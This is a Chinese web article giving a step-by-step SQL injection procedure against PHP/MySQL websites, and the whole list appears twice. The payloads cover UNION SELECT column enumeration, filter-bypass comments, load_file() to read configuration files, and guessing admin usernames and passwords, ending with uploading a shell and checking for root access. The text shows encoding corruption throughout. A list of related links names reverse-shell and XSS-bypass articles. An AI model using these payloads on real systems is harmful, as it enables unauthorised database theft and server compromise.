php注入基本步驟小結(jié)
發(fā)布時(shí)間:2011-04-01 00:43:02 作者:佚名
我要評論
php注入基本步驟小結(jié),我們在編寫代碼的時(shí)候一定要注意注入點(diǎn)。
php注入十點(diǎn)基本步驟
1、判斷是否存在注入,加'、and 1=1、and 1=2
2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本,可以用union查詢
3、利用order by 暴字段,在網(wǎng)址后加 order by 10/* 如果返回正常說明字段大于10
4、再利用union來查詢準(zhǔn)確字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常報(bào)出數(shù)字,說明猜到準(zhǔn)確字段數(shù)。如過濾了空格可以用/**/代替。
(可在分別用user()、database()、version()進(jìn)行替換報(bào)出的數(shù)字進(jìn)而查看信息)
5、判斷數(shù)據(jù)庫連接帳號有沒有寫權(quán)限,and (select count(*) from mysql.user)>0/* 如果結(jié)果返回錯(cuò)誤,那我們只能猜解管理員帳號和密碼了。
6、如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file(char(文件路徑的ascii值,用逗號隔開))也可以用十六進(jìn)制,通過這種方式讀取配置文件,找到數(shù)據(jù)庫連接等。
7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,說明存在這個(gè)表。
8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按報(bào)出的數(shù)字進(jìn)行替換
9、同理再猜解password字段,猜解成功再找后臺登錄。
10、登錄后臺,上傳shell。
11、檢測是不是root權(quán)限 and/**/ord(mid(user(),1,1))=114/*
1、判斷是否存在注入,加'、and 1=1、and 1=2
2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本,可以用union查詢
3、利用order by 暴字段,在網(wǎng)址后加 order by 10/* 如果返回正常說明字段大于10
4、再利用union來查詢準(zhǔn)確字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常報(bào)出數(shù)字,說明猜到準(zhǔn)確字段數(shù)。如過濾了空格可以用/**/代替。
(可在分別用user()、database()、version()進(jìn)行替換報(bào)出的數(shù)字進(jìn)而查看信息)
5、判斷數(shù)據(jù)庫連接帳號有沒有寫權(quán)限,and (select count(*) from mysql.user)>0/* 如果結(jié)果返回錯(cuò)誤,那我們只能猜解管理員帳號和密碼了。
6、如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file(char(文件路徑的ascii值,用逗號隔開))也可以用十六進(jìn)制,通過這種方式讀取配置文件,找到數(shù)據(jù)庫連接等。
7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,說明存在這個(gè)表。
8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按報(bào)出的數(shù)字進(jìn)行替換
9、同理再猜解password字段,猜解成功再找后臺登錄。
10、登錄后臺,上傳shell。
11、檢測是不是root權(quán)限 and/**/ord(mid(user(),1,1))=114/*
相關(guān)文章

thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來介紹一下thinkphp官方修復(fù)的一個(gè)getshell漏洞,框架對控制器沒有進(jìn)行足夠的檢測導(dǎo)致的一處getshell,小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實(shí)例分析,需要的朋友可以參考下2017-05-19
ASP+PHP 標(biāo)準(zhǔn)sql注入語句(完整版)
這里為大家分享一下sql注入的一些語句,很多情況下由于程序員的安全意識薄弱或基本功不足就容易導(dǎo)致sql注入安全問題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19- 對于目前流行的sql注入,程序員在編寫程序時(shí),都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,2017-04-29
XSS繞過技術(shù) XSS插入繞過一些方式總結(jié)
我們友情進(jìn)行XSS檢查,偶然跳出個(gè)小彈窗,其中我們總結(jié)了一些平時(shí)可能用到的XSS插入方式,方便我們以后進(jìn)行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類2016-12-27- 這篇文章主要介紹了Python 爬蟲使用動態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08
使用爬蟲采集網(wǎng)站時(shí),解決被封IP的幾種方法
這篇文章主要介紹了使用爬蟲采集網(wǎng)站時(shí),解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08


